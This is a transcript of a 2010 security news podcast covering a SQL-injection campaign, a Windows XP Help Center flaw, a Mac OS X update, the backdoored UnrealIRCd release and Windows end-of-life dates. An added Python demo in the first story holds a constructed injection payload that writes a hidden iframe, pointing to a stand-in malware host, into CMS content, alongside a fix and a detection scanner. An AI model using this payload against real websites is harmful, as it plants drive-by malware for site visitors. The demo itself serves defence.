Hello and welcome to the CERTStation Podcast for the 24th week of 2010. I am Jay Johnson and these are the headlines:
Mass website hack aimed at online gamers (pause)
A critical, unpatched Windows XP bug is under attack, while
Apple releases the Mac OS X 10.6.4 update (pause)
An IRC server is found to have had a backdoor in its source code for months, and finally
Windows 2000 and Windows XP Service Pack 2 go end of life in July
And now for this week's newswire details:
According to the latest analysis, the mass website hacks which have been showing up over the last week are aimed at stealing access credentials for online games. The hackers' most prominent victims serving the malware have been the Wall Street Journal and the Jerusalem Post websites.
The hacked web servers are all Microsoft Internet Information Server (IIS) and ASP.NET-based, but analysis by a number of security service providers has shown that the attacker used SQL injection vulnerabilities in custom web applications to hack the websites. Administrators are advised to check their systems for any signs of interference and tampering.
The SQL injection vulnerability allows attackers to write their own HTML and JavaScript into the hacked sites' content management system databases. Specifically, the attackers embedded code which loads an exploit for the recently discovered vulnerability in Flash Player into an iFrame.
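An added example, not from the podcast or from any of the affected sites, showing the two defender-side checks this story calls for: why a string-built query lets an injected `UPDATE` write an iFrame into stored CMS content while a parameterised query does not, and a scan of stored article bodies for the kind of tampering administrators are advised to look for. sqlite3 stands in for the sites' real database, and every table name, hostname, payload and sample row is constructed for the demo.

```python
"""Added example (not from the CERTStation podcast). Two checks against the
mass-SQL-injection campaign described in the story:

1. search_unsafe / search_safe: the same CMS search, once with the term spliced
   into the SQL text and once bound as a parameter.  The constructed PAYLOAD
   appends an UPDATE that writes an <iframe> into every article body.
2. find_injected_markup / scan_rows: detection over stored article bodies for
   <iframe>/<script> tags loading from hosts outside the site's own allow-list,
   plus inline <script> blocks, which article text should never contain.

sqlite3 stands in for the real database; all names and data are constructed.
"""
import re
import sqlite3
from urllib.parse import urlparse

# Constructed: hosts this (hypothetical) site legitimately embeds content from.
TRUSTED_HOSTS = {"www.example-news.test", "cdn.example-news.test"}

ORIGINAL_BODY = "<p>Stocks rose.</p>"

# Constructed payload in the style the story describes: close the string
# literal, append an UPDATE that concatenates an iFrame onto every body,
# then re-balance the trailing quote with a harmless SELECT.
INJECTED_IFRAME = ('<iframe src="http://malware.example.test/flash.swf" '
                   'width="0" height="0"></iframe>')
PAYLOAD = "x%'; UPDATE articles SET body = body || '" + INJECTED_IFRAME + "'; SELECT '"


def make_db():
    """Fresh in-memory CMS table with one article (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE articles(id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    con.execute("INSERT INTO articles VALUES (1, 'Markets', ?)", (ORIGINAL_BODY,))
    return con


def search_unsafe(con, term):
    """Vulnerable: the search term becomes part of the SQL text.  executescript
    stands in for a driver that accepts stacked statements, as the ASP.NET/SQL
    Server stacks in the story did."""
    sql = f"SELECT id FROM articles WHERE title LIKE '%{term}%'"
    con.executescript(sql)


def search_safe(con, term):
    """Hardened: the term is bound as a parameter, so it can only ever be data."""
    return con.execute("SELECT id FROM articles WHERE title LIKE ?",
                       (f"%{term}%",)).fetchall()


def body_after(search):
    """Run one search variant with PAYLOAD against a fresh DB; return stored body."""
    con = make_db()
    search(con, PAYLOAD)
    return con.execute("SELECT body FROM articles WHERE id = 1").fetchone()[0]


# --- detection over stored content -------------------------------------------
TAG_RE = re.compile(r"<(iframe|script)\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)",
                    re.IGNORECASE)
INLINE_SCRIPT_RE = re.compile(r"<script\b(?![^>]*\bsrc\s*=)[^>]*>", re.IGNORECASE)


def _src_host(src):
    """Host of a src attribute; '' for a relative (same-site) path."""
    if src.startswith("//"):          # protocol-relative URL
        src = "https:" + src
    return (urlparse(src).hostname or "").lower()


def find_injected_markup(html, trusted_hosts=TRUSTED_HOSTS):
    """Return [(tag, src), ...] for iframes/scripts loaded from untrusted hosts
    and for inline <script> blocks.  Relative paths are treated as local."""
    findings = []
    for tag, src in TAG_RE.findall(html):
        host = _src_host(src)
        if host and host not in trusted_hosts:
            findings.append((tag.lower(), src))
    for _ in INLINE_SCRIPT_RE.finditer(html):
        findings.append(("script", "<inline>"))
    return findings


# Constructed sample of stored article bodies: one clean, one with the
# campaign-style iFrame, one with an inline obfuscated script.
SAMPLE_ROWS = [
    (1, '<p>Stocks rose.</p><script src="https://cdn.example-news.test/app.js"></script>'),
    (2, "<p>Opinion</p>" + INJECTED_IFRAME),
    (3, '<p>Sports</p><script>eval(atob("BASE64_PLACEHOLDER"))</script>'),
]


def scan_rows(rows, trusted_hosts=TRUSTED_HOSTS):
    """Map article id -> findings, only for rows that contain suspect markup."""
    report = {}
    for rid, body in rows:
        findings = find_injected_markup(body, trusted_hosts)
        if findings:
            report[rid] = findings
    return report


if __name__ == "__main__":
    print("unsafe search left body as:", body_after(search_unsafe))
    print("safe search left body as:  ", body_after(search_safe))
    for rid, hits in scan_rows(SAMPLE_ROWS).items():
        print(f"article {rid}: {hits}")
```

The scan is deliberately allow-list based: it does not try to recognise the attacker's domains, which change from wave to wave, but flags any embedded resource the site did not already trust. In a real clean-up the same query would be run across every text column the CMS renders, not just article bodies.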
(pause)
Five days after it was disclosed in a highly controversial advisory, a critical vulnerability in Microsoft's Windows XP operating system is being exploited by criminal hackers, researchers from anti-virus provider Sophos said on Tuesday.
The flaw in the Windows Help and Support Center was disclosed on Thursday by researcher Tavis Ormandy. His public advisory came just five days after he privately informed Microsoft of the defect, prompting fierce criticism from some circles that he hadn't given the software giant adequate time to fix the hole. That made it easier for attackers to target the bug, which allows attackers to take complete control of vulnerable machines when a user views a specially designed webpage, the critics howled.
Microsoft soon amended its own advisory on the vulnerability to say researchers are aware of limited, targeted active attacks that use this exploit code. Although the vulnerability also afflicts Windows Server 2003, Microsoft's advisory said that OS wasn't currently at risk from these attacks.
Users of XP and Server 2003 should consider disabling features within Help Center that allow administrators to remotely log onto machines.
(pause)
Apple has released Mac OS X 10.6.4, an update that improves the operating system's stability, compatibility and security. In addition to other changes, the update addresses a total of 28 security holes, some of which can be exploited to hijack a user's system. According to Apple, it's sufficient, in many cases, to simply visit a specially crafted website.
The update includes the latest Safari 5 release, which closed 48 security vulnerabilities last week, and fixes issues causing the keyboard or trackpad to become unresponsive, problems copying, renaming or deleting files on SMB file servers, playback problems in the DVD Player under certain settings, and volume and sleep issues in early 2010 MacBook Pro models. The reliability of VPN connections has been improved and a noise problem related to some third-party FireWire audio devices has also been corrected.
Additionally, the update addresses a number of security issues in Mac OS X, including, for example, problems with the CUPS printing service, ImageIO, Kerberos, iChat and the Samba server. While the update includes version 10.0.45.2 of the Flash Player plug-in, closing two vulnerabilities, the latest version is Flash 10.1, which fixes a total of 32 vulnerabilities, including a recently exploited 0-day flaw. Users who have already installed Flash 10.1 are advised to make sure that it is not overwritten by Apple's update; normally this should not be the case.
(pause)
The developers of the open source IRC server UnrealIRCd have had to report that the file servers of the project were compromised several months ago and the IRC server's main source file was replaced by a version with a backdoor. The backdoor allows anyone to execute commands on the server running UnrealIRCd, with the privileges of the user running the IRC daemon, even if the IRC server is a hub or normally requires passwords for access. According to the report, the version with the backdoor was apparently placed on the file servers in November 2009, but remained unnoticed until now.
To ensure that there isn't a repeat of the incident, the developers say they plan to re-implement the PGP or GPG signing of releases. A later posting in the forums says this has now been implemented. The developers do note that only the one file, Unreal3.2.8.1.tar.gz, was affected.
On the heise online forums an UnrealIRCd supporter has clarified the original statements about the intrusion. The supporter says that, since the source code tarball can be compiled on Windows, Windows users should also be concerned if they compile their own version of UnrealIRCd for Windows.
(pause)
As previously announced, support for a number of Microsoft products expires on the 13th of July, 2010. Affected products include all versions of Windows 2000, meaning the server versions as well as Windows 2000 Professional. After this date, Microsoft will no longer fix even critical security vulnerabilities, but will merely maintain its knowledge base as an online help resource.
Support for Windows XP Service Pack 2 will also expire on the 13th of July. Microsoft usually supports Service Packs for up to 12 months after the release of their respective successors; however, due to customer demand Microsoft extended this to 24 months for Windows XP SP2. This does not, however, relate to support for the operating system itself, which will run until 2014, longer than for some versions of Vista. However, after the 13th of July Microsoft will only support XP users who have installed Service Pack 3.
The initial support phase for all versions of Windows Server 2003 also comes to an end on the 13th of July, and it will then enter the second support phase, in which Microsoft will only release free patches for security vulnerabilities which the company classifies as critical. This second phase expires on the 14th of July, 2015.
If you enjoyed this podcast, why not visit CERTStation.com and check out our free Internet Security Dashboard. In the meantime, this is your host Jay Johnson wishing you a safe and secure week.